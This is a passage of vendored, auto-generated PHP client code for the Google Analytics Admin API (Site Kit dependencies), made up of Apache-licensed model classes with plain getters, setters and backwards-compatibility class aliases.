\Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'orderBys'; protected $dateRangesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessDateRange::class; protected $dateRangesDataType = 'array'; protected $dimensionFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpression::class; protected $dimensionFilterDataType = ''; protected $dimensionsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessDimension::class; protected $dimensionsDataType = 'array'; /** * @var string */ public $limit; protected $metricFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpression::class; protected $metricFilterDataType = ''; protected $metricsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessMetric::class; protected $metricsDataType = 'array'; /** * @var string */ public $offset; protected $orderBysType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessOrderBy::class; protected $orderBysDataType = 'array'; /** * @var bool */ public $returnEntityQuota; /** * @var string */ public $timeZone; /** * @param GoogleAnalyticsAdminV1alphaAccessDateRange[] */ public function setDateRanges($dateRanges) { $this->dateRanges = $dateRanges; } /** * @return GoogleAnalyticsAdminV1alphaAccessDateRange[] */ public function getDateRanges() { return $this->dateRanges; } /** * @param GoogleAnalyticsAdminV1alphaAccessFilterExpression */ public function setDimensionFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpression $dimensionFilter) { $this->dimensionFilter = $dimensionFilter; } /** * @return GoogleAnalyticsAdminV1alphaAccessFilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param GoogleAnalyticsAdminV1alphaAccessDimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return GoogleAnalyticsAdminV1alphaAccessDimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setLimit($limit) { $this->limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param GoogleAnalyticsAdminV1alphaAccessFilterExpression */ public function setMetricFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return GoogleAnalyticsAdminV1alphaAccessFilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param GoogleAnalyticsAdminV1alphaAccessMetric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return GoogleAnalyticsAdminV1alphaAccessMetric[] */ public function getMetrics() { return $this->metrics; } /** * @param string */ public function setOffset($offset) { $this->offset = $offset; } /** * @return string */ public function getOffset() { return $this->offset; } /** * @param GoogleAnalyticsAdminV1alphaAccessOrderBy[] */ public function setOrderBys($orderBys) { $this->orderBys = $orderBys; } /** * @return GoogleAnalyticsAdminV1alphaAccessOrderBy[] */ public function getOrderBys() { return $this->orderBys; } /** * @param bool */ public function setReturnEntityQuota($returnEntityQuota) { $this->returnEntityQuota = $returnEntityQuota; } /** * @return bool */ public function getReturnEntityQuota() { return $this->returnEntityQuota; } /** * @param string */ public function setTimeZone($timeZone) { $this->timeZone = $timeZone; } /** * @return string */ public function getTimeZone() { return $this->timeZone; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaRunAccessReportRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaRunAccessReportRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinkProposalsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'displayVideo360AdvertiserLinkProposals'; protected $displayVideo360AdvertiserLinkProposalsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal::class; protected $displayVideo360AdvertiserLinkProposalsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal[] */ public function setDisplayVideo360AdvertiserLinkProposals($displayVideo360AdvertiserLinkProposals) { $this->displayVideo360AdvertiserLinkProposals = $displayVideo360AdvertiserLinkProposals; } /** * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal[] */ public function getDisplayVideo360AdvertiserLinkProposals() { return $this->displayVideo360AdvertiserLinkProposals; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinkProposalsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinkProposalsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessStringFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $caseSensitive; /** * @var string */ public $matchType; /** * @var string */ public $value; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setMatchType($matchType) { $this->matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessStringFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessStringFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListAccountSummariesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'accountSummaries'; protected $accountSummariesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccountSummary::class; protected $accountSummariesDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaAccountSummary[] */ public function setAccountSummaries($accountSummaries) { $this->accountSummaries = $accountSummaries; } /** * @return GoogleAnalyticsAdminV1betaAccountSummary[] */ public function getAccountSummaries() { return $this->accountSummaries; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListAccountSummariesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListAccountSummariesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'measurementProtocolSecrets'; protected $measurementProtocolSecretsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class; protected $measurementProtocolSecretsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret[] */ public function setMeasurementProtocolSecrets($measurementProtocolSecrets) { $this->measurementProtocolSecrets = $measurementProtocolSecrets; } /** * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret[] */ public function getMeasurementProtocolSecrets() { return $this->measurementProtocolSecrets; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaGoogleAdsLink extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $adsPersonalizationEnabled; /** * @var bool */ public $canManageClients; /** * @var string */ public $createTime; /** * @var string */ public $creatorEmailAddress; /** * @var string */ public $customerId; /** * @var string */ public $name; /** * @var string */ public $updateTime; /** * @param bool */ public function setAdsPersonalizationEnabled($adsPersonalizationEnabled) { $this->adsPersonalizationEnabled = $adsPersonalizationEnabled; } /** * @return bool */ public function getAdsPersonalizationEnabled() { return $this->adsPersonalizationEnabled; } /** * @param bool */ public function setCanManageClients($canManageClients) { $this->canManageClients = $canManageClients; } /** * @return bool */ public function getCanManageClients() { return $this->canManageClients; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setCreatorEmailAddress($creatorEmailAddress) { $this->creatorEmailAddress = $creatorEmailAddress; } /** * @return string */ public function getCreatorEmailAddress() { return $this->creatorEmailAddress; } /** * @param string */ public function setCustomerId($customerId) { $this->customerId = $customerId; } /** * @return string */ public function getCustomerId() { return $this->customerId; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaGoogleAdsLink::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaGoogleAdsLink'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceFilterExpression extends \Google\Site_Kit_Dependencies\Google\Model { protected $andGroupType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList::class; protected $andGroupDataType = ''; protected $dimensionOrMetricFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilter::class; protected $dimensionOrMetricFilterDataType = ''; protected $eventFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceEventFilter::class; protected $eventFilterDataType = ''; protected $notExpressionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression::class; protected $notExpressionDataType = ''; protected $orGroupType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList::class; protected $orGroupDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList */ public function setAndGroup(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList $andGroup) { $this->andGroup = $andGroup; } /** * @return GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList */ public function getAndGroup() { return $this->andGroup; } /** * @param GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilter */ public function setDimensionOrMetricFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilter $dimensionOrMetricFilter) { $this->dimensionOrMetricFilter = $dimensionOrMetricFilter; } /** * @return GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilter */ public function getDimensionOrMetricFilter() { return $this->dimensionOrMetricFilter; } /** * @param GoogleAnalyticsAdminV1alphaAudienceEventFilter */ public function setEventFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceEventFilter $eventFilter) { $this->eventFilter = $eventFilter; } /** * @return GoogleAnalyticsAdminV1alphaAudienceEventFilter */ public function getEventFilter() { return $this->eventFilter; } /** * @param GoogleAnalyticsAdminV1alphaAudienceFilterExpression */ public function setNotExpression(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression $notExpression) { $this->notExpression = $notExpression; } /** * @return GoogleAnalyticsAdminV1alphaAudienceFilterExpression */ public function getNotExpression() { return $this->notExpression; } /** * @param GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList */ public function setOrGroup(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList $orGroup) { $this->orGroup = $orGroup; } /** * @return GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList */ public function getOrGroup() { return $this->orGroup; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceFilterExpression'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessMetricHeader extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $metricName; /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessMetricHeader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessMetricHeader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessInListFilter extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'values'; /** * @var bool */ public $caseSensitive; /** * @var string[] */ public $values; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string[] */ public function setValues($values) { $this->values = $values; } /** * @return string[] */ public function getValues() { return $this->values; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessInListFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessInListFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaIosAppDataStream extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $bundleId; /** * @var string */ public $createTime; /** * @var string */ public $displayName; /** * @var string */ public $firebaseAppId; /** * @var string */ public $name; /** * @var string */ public $updateTime; /** * @param string */ public function setBundleId($bundleId) { $this->bundleId = $bundleId; } /** * @return string */ public function getBundleId() { return $this->bundleId; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setFirebaseAppId($firebaseAppId) { $this->firebaseAppId = $firebaseAppId; } /** * @return string */ public function getFirebaseAppId() { return $this->firebaseAppId; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaIosAppDataStream::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaIosAppDataStream'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaGlobalSiteTag extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @var string */ public $snippet; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setSnippet($snippet) { $this->snippet = $snippet; } /** * @return string */ public function getSnippet() { return $this->snippet; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaGlobalSiteTag::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaGlobalSiteTag'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListUserLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'userLinks'; /** * @var string */ public $nextPageToken; protected $userLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class; protected $userLinksDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param GoogleAnalyticsAdminV1alphaUserLink[] */ public function setUserLinks($userLinks) { $this->userLinks = $userLinks; } /** * @return GoogleAnalyticsAdminV1alphaUserLink[] */ public function getUserLinks() { return $this->userLinks; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListUserLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListUserLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceFilterClause extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $clauseType; protected $sequenceFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceSequenceFilter::class; protected $sequenceFilterDataType = ''; protected $simpleFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceSimpleFilter::class; protected $simpleFilterDataType = ''; /** * @param string */ public function setClauseType($clauseType) { $this->clauseType = $clauseType; } /** * @return string */ public function getClauseType() { return $this->clauseType; } /** * @param GoogleAnalyticsAdminV1alphaAudienceSequenceFilter */ public function setSequenceFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceSequenceFilter $sequenceFilter) { $this->sequenceFilter = $sequenceFilter; } /** * @return GoogleAnalyticsAdminV1alphaAudienceSequenceFilter */ public function getSequenceFilter() { return $this->sequenceFilter; } /** * @param GoogleAnalyticsAdminV1alphaAudienceSimpleFilter */ public function setSimpleFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceSimpleFilter $simpleFilter) { $this->simpleFilter = $simpleFilter; } /** * @return GoogleAnalyticsAdminV1alphaAudienceSimpleFilter */ public function getSimpleFilter() { return $this->simpleFilter; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterClause::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceFilterClause'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessDimension extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessDimension::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessDimension'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListMeasurementProtocolSecretsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'measurementProtocolSecrets'; protected $measurementProtocolSecretsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret::class; protected $measurementProtocolSecretsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaMeasurementProtocolSecret[] */ public function setMeasurementProtocolSecrets($measurementProtocolSecrets) { $this->measurementProtocolSecrets = $measurementProtocolSecrets; } /** * @return GoogleAnalyticsAdminV1betaMeasurementProtocolSecret[] */ public function getMeasurementProtocolSecrets() { return $this->measurementProtocolSecrets; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListMeasurementProtocolSecretsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListMeasurementProtocolSecretsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'changeHistoryEvents'; protected $changeHistoryEventsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaChangeHistoryEvent::class; protected $changeHistoryEventsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaChangeHistoryEvent[] */ public function 